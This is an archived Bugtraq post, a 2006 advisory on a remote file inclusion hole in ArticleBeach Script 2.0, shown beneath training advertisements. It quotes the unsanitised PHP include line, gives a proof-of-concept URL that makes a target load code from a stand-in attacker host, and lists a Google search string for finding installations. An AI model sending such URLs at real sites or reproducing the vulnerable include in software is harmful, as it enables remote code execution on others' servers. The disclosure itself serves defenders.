Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability

from [Bithedz] Network Security [Permanent Link]
Subject: ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability
Date: 27 Oct 2006 00:34:03 -0000 
------------------------------------------------------------------------------
ArticleBeach Script <= 2.0 (page) Remote File Inclusion Vulnerability
------------------------------------------------------------------------------

Author          : Zeni Susanto a.k.a Bithedz
Date Found      : October, 22th 2006
Location        : Indonesia, Bandung
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
Application     : ArticleBeach
version         : 2.0
vendor          : http://articlebeach.com
source url      : http://www.articlebeach.com/script/

---------------------------------------------------------------------------

Description:
~~~~~~~~~
Articlebeach is Your one-stop source for free articles. Do you need contents to 
add to your web site? Or articles for use on your opt-in newsletters and 
e-zines? ArticleBeach has scoured the web and indexed a huge collection of 
articles on various subjects. Just click on the appropriate category to read 
the articles.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~

I found vulnerability script in index.php

---------- index.PHP---------------------------------------------------------
include($_GET["page"].".php"); 
-----------------------------------------------------------------------------

Input passed to the "page" parameter in index.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.



Proof Of Concept:
~~~~~~~~~~~~~

http://target.com/[articlebeach_path]/index.php?page=http://attact.com/colok.txt?

-----------------------------------------------------------------------------

Solution:
~~~~
- download fix in vendor URL 

-----------------------------------------------------------------------------

google d0rk:
~~~~~~~~
"ArticleBeach"

-----------------------------------------------------------------------------
Shoutz:
~~~

~ My Wife Monik 
~ kaiten
~ #e-c-h-o, #bridge (silent) @irc.dal.net
-----------------------------------------------------------------------------

Contact:
~~~~
 
     Bithedz[at]gmail[dot]com
     
[ EOF ]
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability, Bithedz <=
Previous by Date:  Re: [Full-disclosure] IE7 is a Source of Problem - Secunia IE7 Release Incident of October 2006, Jerome Athias
Next by Date:  GestArt <= vbeta 1 Remote File Include Vulnerabilities, ip . 123 . 456 . 78 . 90
Previous by Thread:  [Full-disclosure] RFID enabled e-passport skimming proof of concept code released (RFIDIOt), Adam Laurie
Next by Thread:  GestArt <= vbeta 1 Remote File Include Vulnerabilities, ip . 123 . 456 . 78 . 90
Indexes:  [Date] [Thread] [Top] [All Lists]